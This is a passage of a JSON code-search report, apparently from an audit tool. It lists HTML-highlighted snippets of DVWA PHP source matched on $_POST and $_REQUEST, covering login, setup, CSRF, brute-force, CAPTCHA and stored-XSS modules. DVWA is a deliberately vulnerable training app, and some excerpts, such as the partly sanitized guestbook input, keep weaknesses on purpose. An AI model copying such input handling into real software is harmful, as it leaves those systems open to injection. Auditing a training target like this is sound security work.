punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 310,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">strip_tags</span><span class=\"token punctuation\">(</span> <span class=\"token function\">addslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 30,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">57:</span> \t\t<span class=\"token operator\">*</span> <span class=\"token number\">1</span><span class=\"token punctuation\">.</span> Define what <span class=\"token keyword\">to</span> scan\n<span class=\"line-number\">58:</span> \t\t<span class=\"token operator\">*</span> Please keep <span class=\"token keyword\">in</span> mind what array_merge does <span class=\"token operator\">and</span> how this might interfer\n<span class=\"line-number\">59:</span> \t\t<span class=\"token operator\">*</span> <span class=\"token keyword\">with</span> your variables_order settings\n<span class=\"line-number\">60:</span> \t\t<span class=\"token operator\">*</span><span class=\"token operator\">/</span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$request</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>\n<span class=\"highlight\"><span class=\"line-number\">62:</span> \t\t\t<span class=\"token string\">'REQUEST'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">63:</span> \t\t\t<span class=\"token string\">'GET'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">64:</span> \t\t\t<span class=\"token string\">'POST'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">65:</span> \t\t\t<span class=\"token string\">'COOKIE'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_COOKIE</span>\n<span class=\"line-number\">66:</span> \t\t<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">67:</span> ",
"line": 62,
"start": 57,
"end": 68,
"severity": "unknown",
"note": ""
},
{
"id": 46,
"file": "/home/chris/src/DVWA-master/login.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'login.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> ",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 54,
"file": "/home/chris/src/DVWA-master/security.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">10:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page_id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'security'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> <span class=\"token variable\">$securityHtml</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string\">'seclev_submit'</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'security.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 15,
"start": 10,
"end": 21,
"severity": "unknown",
"note": ""
},
{
"id": 57,
"file": "/home/chris/src/DVWA-master/setup.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Setup'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page_id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'setup'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'create_db'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'MySQL'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">17:</span> \t\tinclude_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/MySQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t}\n<span class=\"line-number\">19:</span> \t<span class=\"token function\">elseif</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'PGSQL'</span><span class=\"token punctuation\">)</span> {",
"line": 14,
"start": 9,
"end": 20,
"severity": "unknown",
"note": ""
},
{
"id": 66,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 73,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 108,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 145,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
"filetype": "php",
"search": "\\s\\$_REQUEST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 154,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
"filetype": "php",
